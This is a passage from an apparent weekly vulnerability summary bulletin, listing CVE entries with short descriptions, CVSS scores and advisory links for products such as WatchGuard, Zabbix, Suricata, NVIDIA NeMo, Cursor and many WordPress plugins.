| WatchGuard--Fireware OS | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WatchGuard Fireware OS allows Stored XSS via the IPS module. This vulnerability requires an authenticated administrator session to a locally managed Firebox. This issue affects Firebox: from 12.0 through 12.11.2. | 2025-12-04 | not yet calculated | CVE-2025-6946 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00011 |
| WatchGuard--Mobile VPN with SSL Client | The WatchGuard Mobile VPN with SSL Client on Windows allows a locally authenticated non-administrative Windows user to escalate their privileges to NT AUTHORITY/SYSTEM on the Windows machine where the VPN Client is installed.This issue affects the Mobile VPN with SSL Client 12.0 up to and including 12.11.2. | 2025-12-04 | not yet calculated | CVE-2025-1910 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00008 |
| WEBIGniter--WEBIGniter | WEBIGniter 28.7.23 contains a cross-site scripting vulnerability in the user creation process that allows unauthenticated attackers to execute malicious JavaScript code, enabling potential XSS attacks. | 2025-12-04 | not yet calculated | CVE-2023-53735 | ExploitDB-51900 Official WEBIGniter Homepage WEBIGniter Demo Page https://www.vulncheck.com/advisories/webigniter-28723-cross-site-scripting-xss-in-user-creation-process |
| xwiki--xwiki-platform | XWiki is an open-source wiki software platform. From 16.7.0 to 16.10.11, 17.4.4, or 17.7.0, in an instance which is using the XWiki Jetty package (XJetty), a context is exposed to statically access any file located in the webapp/ folder. It allows accessing files which might contains credentials. Fixed in 16.10.11, 17.4.4, and 17.7.0. | 2025-12-01 | not yet calculated | CVE-2025-55749 | https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-53gx-j3p6-2rw9 https://github.com/xwiki/xwiki-platform/commit/42fb063749dd88cc78196f72d7318b7179285ebd https://github.com/xwiki/xwiki-platform/commit/99a04a0e2143583f5154a43e02174155da7e8e10 https://github.com/xwiki/xwiki-platform/compare/8b68d8a70b43f25391b3ee48477d7eb71b95cf4b...99a04a0e2143583f5154a43e02174155da7e8e10 https://jira.xwiki.org/browse/XWIKI-23438 |
| yawkat--lz4-java | yawkat LZ4 Java provides LZ4 compression for Java. Insufficient clearing of the output buffer in Java-based decompressor implementations in lz4-java 1.10.0 and earlier allows remote attackers to read previous buffer contents via crafted compressed input. In applications where the output buffer is reused without being cleared, this may lead to disclosure of sensitive data. JNI-based implementations are not affected. This vulnerability is fixed in 1.10.1. | 2025-12-05 | not yet calculated | CVE-2025-66566 | https://github.com/yawkat/lz4-java/security/advisories/GHSA-cmp6-m4wj-q63q https://github.com/yawkat/lz4-java/commit/33d180cb70c4d93c80fb0dc3ab3002f457e93840 |
| Zabbix--Zabbix | An authenticated Zabbix Super Admin can exploit the oauth.authorize action to read arbitrary files from the webserver leading to potential confidentiality loss. | 2025-12-01 | not yet calculated | CVE-2025-27232 | https://support.zabbix.com/browse/ZBX-27282 |
| Zabbix--Zabbix | Library loading on AIX Zabbix Agent builds can be hijacked by local users with write access to the /home/cecuser directory. | 2025-12-01 | not yet calculated | CVE-2025-49642 | https://support.zabbix.com/browse/ZBX-27283 |
| Zabbix--Zabbix | An authenticated Zabbix user (including Guest) is able to cause disproportionate CPU load on the webserver by sending specially crafted parameters to /imgstore.php, leading to potential denial of service. | 2025-12-01 | not yet calculated | CVE-2025-49643 | https://support.zabbix.com/browse/ZBX-27284 |
Vulnerability Summary for the Week of November 24, 2025
Posted on Monday December 01, 2025
High Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| 0x4m4--HexStrike AI | By providing a command-line argument starting with a semi-colon ; to an API endpoint created by the EnhancedCommandExecutor class of the HexStrike AI MCP server, the resultant composed command is executed directly in the context of the MCP server's normal privilege; typically, this is root. There is no attempt to sanitize these arguments in the default configuration of this MCP server at the affected version (as of commit 2f3a5512 in September of 2025). | 2025-11-30 | 9.1 | CVE-2025-35028 | https://takeonme.org/gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000000000000000000011 |
| AMD--AMD Prof | Improper return value within AMD uProf can allow a local attacker to bypass KSLR, potentially resulting in loss of confidentiality or availability. | 2025-11-24 | 7.1 | CVE-2025-48510 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-9019.html |
| AMD--Xilinx Run Time (XRT) | Improper input validation within the XOCL driver may allow a local attacker to generate an integer overflow condition, potentially resulting in loss of confidentiality or availability. | 2025-11-24 | 8 | CVE-2025-52538 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-8014.html |
| AMD--Xilinx Run Time (XRT) | Inadequate lock protection within Xilinx Run time may allow a local attacker to trigger a Use-After-Free condition potentially resulting in loss of confidentiality or availability | 2025-11-24 | 7.3 | CVE-2025-0003 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-8014.html |
| AMD--Xilinx Run Time (XRT) | Improper input validation within the XOCL driver may allow a local attacker to generate an integer overflow condition, potentially resulting in crash or denial of service. | 2025-11-24 | 7.3 | CVE-2025-0005 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-8014.html |
| AMD--Xilinx Run Time (XRT) | A buffer overflow with Xilinx Run Time Environment may allow a local attacker to read or corrupt data from the advanced extensible interface (AXI), potentially resulting in loss of confidentiality, integrity, and/or availability. | 2025-11-24 | 7.3 | CVE-2025-52539 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-8014.html |
| ASR--Lapwing_Linux | Out-of-bounds Read vulnerability in ASR1903ASR3901 in ASR Lapwing_Linux on Linux (nr_fw modules). This vulnerability is associated with program files Code/nr_fw/DLP/src/NrCgi.C. This issue affects Lapwing_Linux: before 2025/11/26. | 2025-11-26 | 7.4 | CVE-2025-13735 | https://www.asrmicro.com/en/goods/psirt?cid=41 |
| blubrry--PowerPress Podcasting plugin by Blubrry | The Blubrry PowerPress plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in all versions up to, and including, 11.15.2. This is due to the plugin validating file extensions but not halting execution when validation fails in the 'powerpress_edit_post' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-11-27 | 8.8 | CVE-2025-13536 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d420ee49-e7b3-43d8-a263-8a93abd1133c?source=cve https://plugins.trac.wordpress.org/browser/powerpress/tags/11.14.1/powerpressadmin.php#L3068 https://plugins.trac.wordpress.org/browser/powerpress/tags/11.14.1/powerpressadmin.php#L3012 https://plugins.trac.wordpress.org/browser/powerpress/tags/11.14.1/powerpressadmin.php#L2368 https://plugins.trac.wordpress.org/changeset/3402635/ |
| Chanjet--CRM | A vulnerability has been found in Chanjet CRM up to 20251106. The impacted element is an unknown function of the file /tools/upgradeattribute.php. The manipulation of the argument gblOrgID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-30 | 7.3 | CVE-2025-13788 | VDB-333792 | Chanjet CRM upgradeattribute.php sql injection VDB-333792 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #690084 | Chanjet CRM V1.0 SQL Injection https://github.com/Bellingham-max/CVE/issues/1 |
| code-projects--COVID Tracking System | A vulnerability was detected in code-projects COVID Tracking System 1.0. This issue affects some unknown processing of the file /login.php. The manipulation of the argument code results in sql injection. The attack may be performed from remote. The exploit is now public and may be used. | 2025-11-24 | 7.3 | CVE-2025-13585 | VDB-333349 | code-projects COVID Tracking System login.php sql injection VDB-333349 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #699840 | code-projects COVID Tracking System V1.0 SQL Injection https://github.com/beamyou/CVE/issues/4 https://code-projects.org/ |
| code-projects--Jonnys Liquor | A security flaw has been discovered in code-projects Jonnys Liquor 1.0. Affected by this issue is some unknown functionality of the file /detail.php of the component GET Parameter Handler. Performing manipulation of the argument Product results in sql injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited. | 2025-11-24 | 7.3 | CVE-2025-13582 | VDB-333346 | code-projects Jonnys Liquor GET Parameter detail.php sql injection VDB-333346 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #699554 | code-projects Jonnys Liquor 1.0 /detail.php SQL injection https://github.com/rassec2/dbcve/issues/5 https://code-projects.org/ |
| code-projects--Library System | A vulnerability has been found in code-projects Library System 1.0. This affects an unknown function of the file /index.php of the component Login. The manipulation of the argument Username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-11-24 | 7.3 | CVE-2025-13578 | VDB-333342 | code-projects Library System Login index.php sql injection VDB-333342 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #699536 | code-projects Library System 1.0 index.php SQL Injection https://github.com/rassec2/dbcve/issues/4 https://code-projects.org/ |
| code-projects--Question Paper Generator | A weakness has been identified in code-projects Question Paper Generator 1.0. This affects an unknown part of the file /signupscript.php of the component POST Parameter Handler. Executing manipulation of the argument Fname can lead to sql injection. The attack can be executed remotely. The exploit has been made available to the public and could be exploited. | 2025-11-24 | 7.3 | CVE-2025-13583 | VDB-333347 | code-projects Question Paper Generator POST Parameter signupscript.php sql injection VDB-333347 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #699591 | code-projects question paper 1.0 /signupscript.php SQL Injection https://github.com/rassec2/dbcve/issues/6 https://code-projects.org/ |
| cursor--cursor | Improper neutralization of special elements used in an OS command ('command injection') in Cursor allows an unauthorized attacker to execute commands that are outside of those specified in the allowlist, resulting in arbitrary code execution. | 2025-11-26 | 9.8 | CVE-2025-62354 | https://hiddenlayer.com/sai_security_advisor/2025-11-cursor/ |
| Dassault Systmes--DELMIA Service Process Engineer | A stored Cross-site Scripting (XSS) vulnerability affecting Service Items Management in DELMIA Service Process Engineer on Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in user's browser session. | 2025-11-24 | 8.7 | CVE-2025-10555 | https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10555 |
| Dassault Systmes--ENOVIA Product Manager | A stored Cross-site Scripting (XSS) vulnerability affecting Requirements in ENOVIA Product Manager from Release 3DEXPERIENCE R2023x through Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in user's browser session. | 2025-11-24 | 8.7 | CVE-2025-10554 | https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10554 |
| DirectoryThemes--Tiger | The Tiger theme for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 101.2.1. This is due to the 'paypal-submit.php' file not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site. | 2025-11-27 | 9.8 | CVE-2025-13675 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4750b57e-7d8d-49d7-bbbf-46483eb97bd9?source=cve https://themeforest.net/item/tiger-social-network-theme-for-companies-professionals/16203995 |
| DirectoryThemes--Tiger | The Tiger theme for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 101.2.1. This is due to the plugin allowing a user to update the user role through the $user->set_role() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to elevate their privileges to that of an administrator. | 2025-11-27 | 8.8 | CVE-2025-13680 | https://www.wordfence.com/threat-intel/vulnerabilities/id/645f60ad-c8e5-47ec-94f1-960de4ef7838?source=cve https://themeforest.net/item/tiger-social-network-theme-for-companies-professionals/16203995 |
| Eaton--Eaton Galileo Software | Improper input sanitization in the file archives upload functionality of Eaton Galileo software allows traversing paths which could lead into an attacker with local access to execute unauthorized code or commands. This security issue has been fixed in the latest version of Galileo which is available on the Eaton download center. | 2025-11-27 | 7.3 | CVE-2025-59890 | https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/etn-va-2025-1024.pdf |
| Elated Themes--FindAll Listing | The FindAll Listing plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.0.5. This is due to the 'findall_listing_user_registration_additional_params' function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site. Note: The vulnerability can only be exploited if the FindAll Membership plugin is also activated, because user registration is in that plugin. | 2025-11-27 | 9.8 | CVE-2025-13538 | https://www.wordfence.com/threat-intel/vulnerabilities/id/14981949-271c-4f98-a6a1-b00619f1436d?source=cve https://themeforest.net/item/findall-business-directory-theme/24415962 |
| Elated Themes--FindAll Membership | The FindAll Membership plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 1.0.4. This is due to the plugin not properly logging in a user with the data that was previously verified through the 'findall_membership_check_facebook_user' and the 'findall_membership_check_google_user' functions. This makes it possible for unauthenticated attackers to log in as administrative users, as long as they have an existing account on the site which can easily be created by default through the temp user functionality, and access to the administrative user's email. | 2025-11-27 | 9.8 | CVE-2025-13539 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a856a96a-68d2-462d-b523-840668980807?source=cve https://themeforest.net/item/findall-business-directory-theme/24415962 |
| factionsecurity--faction | FACTION is a PenTesting Report Generation and Collaboration Framework. Prior to version 1.7.1, an extension execution path in Faction's extension framework permits untrusted extension code to execute arbitrary system commands on the server when a lifecycle hook is invoked, resulting in remote code execution (RCE) on the host running Faction. Due to a missing authentication check on the /portal/AppStoreDashboard endpoint, an attacker can access the extension management UI and upload a malicious extension without any authentication, making this vulnerability exploitable by unauthenticated users. This issue has been patched in version 1.7.1. | 2025-11-26 | 9.7 | CVE-2025-66022 | https://github.com/factionsecurity/faction/security/advisories/GHSA-xr72-2g43-586w https://github.com/factionsecurity/faction/commit/c6389f1c76175b7c1c68d1a87b389311b16c62c3 |
| fugue-project--fugue | Fugue is a unified interface for distributed computing that lets users execute Python, Pandas, and SQL code on Spark, Dask, and Ray with minimal rewrites. In version 0.9.2 and prior, there is a remote code execution vulnerability by pickle deserialization via FlaskRPCServer. The Fugue framework implements an RPC server system for distributed computing operations. In the core functionality of the RPC server implementation, I found that the _decode() function in fugue/rpc/flask.py directly uses cloudpickle.loads() to deserialize data without any sanitization. This creates a remote code execution vulnerability when malicious pickle data is processed by the RPC server. The vulnerability exists in the RPC communication mechanism where the client can send arbitrary serialized Python objects that will be deserialized on the server side, allowing attackers to execute arbitrary code on the victim's machine. This issue has been patched via commit 6f25326. | 2025-11-25 | 8.8 | CVE-2025-62703 | https://github.com/fugue-project/fugue/security/advisories/GHSA-xv5p-fjw5-vrj6 https://github.com/fugue-project/fugue/commit/6f25326779fd1f528198098d6287c5a863176fc0 |
| geoserver--geoserver | GeoServer is an open source server that allows users to share and edit geospatial data. From version 2.26.0 to before 2.26.2 and before 2.25.6, an XML External Entity (XXE) vulnerability was identified. The application accepts XML input through a specific endpoint /geoserver/wms operation GetMap. However, this input is not sufficiently sanitized or restricted, allowing an attacker to define external entities within the XML request. This issue has been patched in GeoServer 2.25.6, GeoServer 2.26.3, and GeoServer 2.27.0. | 2025-11-25 | 8.2 | CVE-2025-58360 | https://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525 https://osgeo-org.atlassian.net/browse/GEOS-11682 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 17.10 before 18.4.5, 18.5 before 18.5.3, and 18.6 before 18.6.1 that could have allowed an unauthenticated user to cause a Denial of Service condition by sending specifically crafted requests containing malicious JSON payloads. | 2025-11-26 | 7.5 | CVE-2025-12571 | GitLab Issue #579168 HackerOne Bug Bounty Report #3362239 |
| GL-Inet--GL-AXT1800 | A firmware downgrade vulnerability exists in the OTA Update functionality of GL-Inet GL-AXT1800 4.7.0. A specially crafted .tar file can lead to a firmware downgrade. An attacker can perform a man-in-the-middle attack to trigger this vulnerability. | 2025-11-24 | 8.3 | CVE-2025-44018 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2230 |
| HCL Software--iNotes | HCL iNotes is susceptible to a Reflected Cross-site Scripting (XSS) vulnerability caused by improper validation of user-supplied input. A remote, unauthenticated attacker can specially craft a URL to execute script in a victim's Web browser within the security context of the hosting Web site and/or steal the victim's cookie-based authentication credentials. | 2025-11-25 | 8.1 | CVE-2025-0248 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127032 |
| Huawei--HarmonyOS | Permission control vulnerability in the memory management module. Impact: Successful exploitation of this vulnerability may affect confidentiality. | 2025-11-28 | 9.3 | CVE-2025-64314 | https://consumer.huawei.com/cn/support/bulletinlaptops/2025/11/ |
| Huawei--HarmonyOS | Permission control vulnerability in the Settings module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-11-28 | 8.4 | CVE-2025-58302 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | UAF vulnerability in the screen recording framework module. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-11-28 | 8.4 | CVE-2025-58303 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | Permission control vulnerability in the distributed component. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-11-28 | 8 | CVE-2025-58310 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | Vulnerability of improper criterion security check in the call module. Impact: Successful exploitation of this vulnerability may cause features to perform abnormally. | 2025-11-28 | 7.3 | CVE-2025-58308 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | DoS vulnerability in the video-related system service module. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-11-28 | 7.3 | CVE-2025-58316 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Janitza--UMG 96-PA | An unauthenticated remote attacker can send a specially crafted Modbus read command to the device which leads to a denial of service. | 2025-11-24 | 7.5 | CVE-2025-41729 | https://certvde.com/de/advisories/VDE-2025-094 |
| kiteworks--security-advisories | Kiteworks MFT orchestrates end-to-end file transfer workflows. Prior to version 9.1.0, a bug in Kiteworks MFT could cause under certain circumstances that a user's active session would not properly time out due to inactivity. This issue has been patched in version 9.1.0. | 2025-11-29 | 7.1 | CVE-2025-53896 | https://github.com/kiteworks/security-advisories/security/advisories/GHSA-23h2-3jj8-58hm |
| kiteworks--security-advisories | Kiteworks MFT orchestrates end-to-end file transfer workflows. Prior to version 9.1.0, the back-end of Kiteworks MFT is vulnerable to an incorrectly specified destination in a communication channel which allows an attacker with administrative privileges on the system under certain circumstances to intercept upstream communication which could lead to an escalation of privileges. This issue has been patched in version 9.1.0. | 2025-11-29 | 7.2 | CVE-2025-53899 | https://github.com/kiteworks/security-advisories/security/advisories/GHSA-5gx5-vcpp-8cr5 |
| Logpoint--SIEM | An issue was discovered in Logpoint before 7.7.0. Insufficient input validation and a lack of output escaping in multiple components leads to a cross-site scripting (XSS) vulnerability. | 2025-11-27 | 8.5 | CVE-2025-66359 | https://servicedesk.logpoint.com/hc/en-us/articles/29158899698333-XSS-Vulnerability-due-to-insufficient-input-validation |
| Mattermost--Mattermost | Mattermost versions 10.12.x <= 10.12.1, 10.11.x <= 10.11.4, 10.5.x <= 10.5.12, 11.0.x <= 11.0.3 fail to properly validate OAuth state tokens during OpenID Connect authentication which allows an authenticated attacker with team creation privileges to take over a user account via manipulation of authentication data during the OAuth completion flow. This requires email verification to be disabled (default: disabled), OAuth/OpenID Connect to be enabled, and the attacker to control two users in the SSO system with one of them never having logged into Mattermost. | 2025-11-27 | 9.9 | CVE-2025-12419 | https://mattermost.com/security-updates |
| Mattermost--Mattermost | Mattermost versions 11.0.x <= 11.0.2, 10.12.x <= 10.12.1, 10.11.x <= 10.11.4, 10.5.x <= 10.5.12 fail to to verify that the token used during the code exchange originates from the same authentication flow, which allows an authenticated user to perform account takeover via a specially crafted email address used when switching authentication methods and sending a request to the /users/login/sso/code-exchange endpoint. The vulnerability requires ExperimentalEnableAuthenticationTransfer to be enabled (default: enabled) and RequireEmailVerification to be disabled (default: disabled). | 2025-11-27 | 9.9 | CVE-2025-12421 | https://mattermost.com/security-updates |
| mescuwa--entropy-derby | Inside Track / Entropy Derby is a research-grade horse-racing betting engine. Prior to commit 2d38d2f, the VDF-based timelock encryption system fails to enforce sequential delay against the betting operator. Bettors pre-compute the entire Wesolowski VDF and include vdfOutputHex in their encrypted bet ticket, allowing the house to decrypt immediately using fast proof verification instead of expensive VDF evaluation. This issue has been patched via commit 2d38d2f. | 2025-11-25 | 8.7 | CVE-2025-65951 | https://github.com/mescuwa/entropy-derby/security/advisories/GHSA-pm54-f847-w4mh https://github.com/mescuwa/entropy-derby/commit/2d38d2f16bbb3b4240698148f80d8c5202725c77 |
| Microsoft--Azure App Gateway | Out-of-bounds read in Application Gateway allows an unauthorized attacker to elevate privileges over a network. | 2025-11-26 | 9.4 | CVE-2025-64656 | Azure Application Gateway Elevation of Privilege Vulnerability |
| Microsoft--Azure App Gateway | Stack-based buffer overflow in Azure Application Gateway allows an unauthorized attacker to elevate privileges over a network. | 2025-11-26 | 9.8 | CVE-2025-64657 | Azure Application Gateway Elevation of Privilege Vulnerability |
| milmor--Telegram Bot & Channel | The Telegram Bot & Channel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Telegram username in all versions up to, and including, 4.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-25 | 7.2 | CVE-2025-13068 | https://www.wordfence.com/threat-intel/vulnerabilities/id/fe4774ee-16f2-478f-92e3-8a7da7b30336?source=cve https://plugins.trac.wordpress.org/browser/telegram-bot/tags/4.1/columns.php#L45 |
| MISP--MISP | app/Controller/EventsController.php in MISP before 2.5.24 has invalid logic in checking for uploaded file validity, related to tmp_name. | 2025-11-28 | 8.2 | CVE-2025-66384 | https://github.com/misp/misp/commit/6867f0d3157a1959154bdad9ddac009dec6a19f5 https://github.com/MISP/MISP/compare/v2.5.23...v2.5.24 |
| n/a--Qualitor | A security flaw has been discovered in Qualitor 8.20/8.24. Affected by this vulnerability is the function eval of the file /html/st/stdeslocamento/request/getResumo.php. Performing manipulation of the argument passageiros results in code injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-30 | 7.3 | CVE-2025-13792 | VDB-333796 | Qualitor getResumo.php eval code injection VDB-333796 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691251 | Qualitor Qualitor Web 8.20/8.24 Code Injection https://www.youtube.com/watch?v=hU8YbFc6KpI |
| n/a--validator | Versions of the package validator before 13.15.22 are vulnerable to Incomplete Filtering of One or More Instances of Special Elements in the isLength() function that does not take into account Unicode variation selectors (\uFE0F, \uFE0E) appearing in a sequence which lead to improper string length calculation. This can lead to an application using isLength for input validation accepting strings significantly longer than intended, resulting in issues like data truncation in databases, buffer overflows in other system components, or denial-of-service. | 2025-11-27 | 7.5 | CVE-2025-12758 | https://security.snyk.io/vuln/SNYK-JS-VALIDATOR-13653476 https://gist.github.com/koral--/ad31208b25b9e3d1e2e35f1d4d72572e https://github.com/validatorjs/validator.js/pull/2616 |
| Nozomi Networks--Guardian | A Stored Cross-Site Scripting vulnerability was discovered in the Dashboards functionality due to improper validation of an input parameter. An authenticated low-privilege user can craft a malicious dashboard containing a JavaScript payload and share it with victim users, or a victim can be socially engineered to import a malicious dashboard template. When the victim views or imports the dashboard, the XSS executes in their browser context, allowing the attacker to perform unauthorized actions as the victim, such as modify application data, disrupt application availability, and access limited sensitive information. | 2025-11-25 | 7.9 | CVE-2025-40890 | https://security.nozominetworks.com/NN-2025:11-01 |
| NVIDIA--DGX Spark | NVIDIA DGX Spark GB10 contains a vulnerability in SROOT, where an attacker could use privileged access to gain access to SoC protected areas. A successful exploit of this vulnerability might lead to code execution, information disclosure, data tampering, denial of service, or escalation of privileges. | 2025-11-25 | 9.3 | CVE-2025-33187 | https://nvd.nist.gov/vuln/detail/CVE-2025-33187 https://www.cve.org/CVERecord?id=CVE-2025-33187 https://nvidia.custhelp.com/app/answers/detail/a_id/5720 |
| NVIDIA--DGX Spark | NVIDIA DGX Spark GB10 contains a vulnerability in hardware resources where an attacker could tamper with hardware controls. A successful exploit of this vulnerability might lead to information disclosure, data tampering, or denial of service. | 2025-11-25 | 8 | CVE-2025-33188 | https://nvd.nist.gov/vuln/detail/CVE-2025-33188 https://www.cve.org/CVERecord?id=CVE-2025-33188 https://nvidia.custhelp.com/app/answers/detail/a_id/5720 |
| NVIDIA--DGX Spark | NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware, where an attacker could cause an out-of-bound write. A successful exploit of this vulnerability might lead to code execution, data tampering, denial of service, information disclosure, or escalation of privileges. | 2025-11-25 | 7.8 | CVE-2025-33189 | https://nvd.nist.gov/vuln/detail/CVE-2025-33189 https://www.cve.org/CVERecord?id=CVE-2025-33189 https://nvidia.custhelp.com/app/answers/detail/a_id/5720 |
| NVIDIA--NeMo Agent ToolKit | NVIDIA NeMo Agent Toolkit UI for Web contains a vulnerability in the chat API endpoint where an attacker may cause a Server-Side Request Forgery. A successful exploit of this vulnerability may lead to information disclosure and denial of service. | 2025-11-25 | 7.6 | CVE-2025-33203 | https://nvd.nist.gov/vuln/detail/CVE-2025-33203 https://www.cve.org/CVERecord?id=CVE-2025-33203 https://nvidia.custhelp.com/app/answers/detail/a_id/5726 |
| NVIDIA--NeMo Framework | NVIDIA NeMo Framework for all platforms contains a vulnerability in the NLP and LLM components, where malicious data created by an attacker could cause code injection. A successful exploit of this vulnerability may lead to code execution, escalation of privileges, information disclosure, and data tampering. | 2025-11-25 | 7.8 | CVE-2025-33204 | https://nvd.nist.gov/vuln/detail/CVE-2025-33204 https://www.cve.org/CVERecord?id=CVE-2025-33204 https://nvidia.custhelp.com/app/answers/detail/a_id/5729 |
| NVIDIA--NeMo Framework | NVIDIA NeMo framework contains a vulnerability in a predefined variable, where an attacker could cause inclusion of functionality from an untrusted control sphere by use of a predefined variable. A successful exploit of this vulnerability may lead to code execution. | 2025-11-25 | 7.3 | CVE-2025-33205 | https://nvd.nist.gov/vuln/detail/CVE-2025-33205 https://www.cve.org/CVERecord?id=CVE-2025-33205 https://nvidia.custhelp.com/app/answers/detail/a_id/5729 |
| OISF--suricata | Suricata is a network IDS, IPS and NSM engine developed by the OISF (Open Information Security Foundation) and the Suricata community. Prior to versions 7.0.13 and 8.0.2, a single byte read heap overflow when logging the verdict in eve.alert and eve.drop records can lead to crashes. This requires the per packet alert queue to be filled with alerts and then followed by a pass rule. This issue has been patched in versions 7.0.13 and 8.0.2. To reduce the likelihood of this issue occurring, the alert queue size a should be increased (packet-alert-max in suricata.yaml) if verdict is enabled. | 2025-11-26 | 7.5 | CVE-2025-64330 | https://github.com/OISF/suricata/security/advisories/GHSA-83v7-gm34-f437 https://github.com/OISF/suricata/commit/482e5eac9218d007adbe2410d6c00173368ce947 |
| OISF--suricata | Suricata is a network IDS, IPS and NSM engine developed by the OISF (Open Information Security Foundation) and the Suricata community. Prior to versions 7.0.13 and 8.0.2, a stack overflow can occur on large HTTP file transfers if the user has increased the HTTP response body limit and enabled the logging of printable http bodies. This issue has been patched in versions 7.0.13 and 8.0.2. A workaround for this issue involves using default HTTP response body limits and/or disabling http-body-printable logging; body logging is disabled by default. | 2025-11-26 | 7.5 | CVE-2025-64331 | https://github.com/OISF/suricata/security/advisories/GHSA-v32w-j79x-pfj2 |
| OISF--suricata | Suricata is a network IDS, IPS and NSM engine developed by the OISF (Open Information Security Foundation) and the Suricata community. Prior to versions 7.0.13 and 8.0.2, a stack overflow that causes Suricata to crash can occur if SWF decompression is enabled. This issue has been patched in versions 7.0.13 and 8.0.2. A workaround for this issue involves disabling SWF decompression (swf-decompression in suricata.yaml), it is disabled by default; set decompress-depth to lower than half your stack size if swf-decompression must be enabled. | 2025-11-26 | 7.5 | CVE-2025-64332 | https://github.com/OISF/suricata/security/advisories/GHSA-p32q-7wcp-gv92 https://github.com/OISF/suricata/commit/ad446c9006a77490af51c468aae0ce934f4d2117 |
| OISF--suricata | Suricata is a network IDS, IPS and NSM engine developed by the OISF (Open Information Security Foundation) and the Suricata community. Prior to versions 7.0.13 and 8.0.2, a large HTTP content type, when logged can cause a stack overflow crashing Suricata. This issue has been patched in versions 7.0.13 and 8.0.2. A workaround for this issue involves limiting stream.reassembly.depth to less then half the stack size. Increasing the process stack size makes it less likely the bug will trigger. | 2025-11-26 | 7.5 | CVE-2025-64333 | https://github.com/OISF/suricata/security/advisories/GHSA-537h-xxmx-v87m |
| OISF--suricata | Suricata is a network IDS, IPS and NSM engine developed by the OISF (Open Information Security Foundation) and the Suricata community. In versions from 8.0.0 to before 8.0.2, compressed HTTP data can lead to unbounded memory growth during decompression. This issue has been patched in version 8.0.2. A workaround involves disabling LZMA decompression or limiting response-body-limit size. | 2025-11-26 | 7.5 | CVE-2025-64334 | https://github.com/OISF/suricata/security/advisories/GHSA-r5jf-v2gx-gx8w https://github.com/OISF/suricata/commit/00f04daa3a44928dfdd0003cb9735469272c94a1 |
| OISF--suricata | Suricata is a network IDS, IPS and NSM engine developed by the OISF (Open Information Security Foundation) and the Suricata community. In versions from 8.0.0 to before 8.0.2, a NULL dereference can occur when the entropy keyword is used in conjunction with base64_data. This issue has been patched in version 8.0.2. A workaround involves disabling rules that use entropy in conjunction with base64_data. | 2025-11-26 | 7.5 | CVE-2025-64335 | https://github.com/OISF/suricata/security/advisories/GHSA-v299-h7p3-q4f2 https://github.com/OISF/suricata/commit/c935f08cd988600fd0a4f828a585b181dd5de012 |
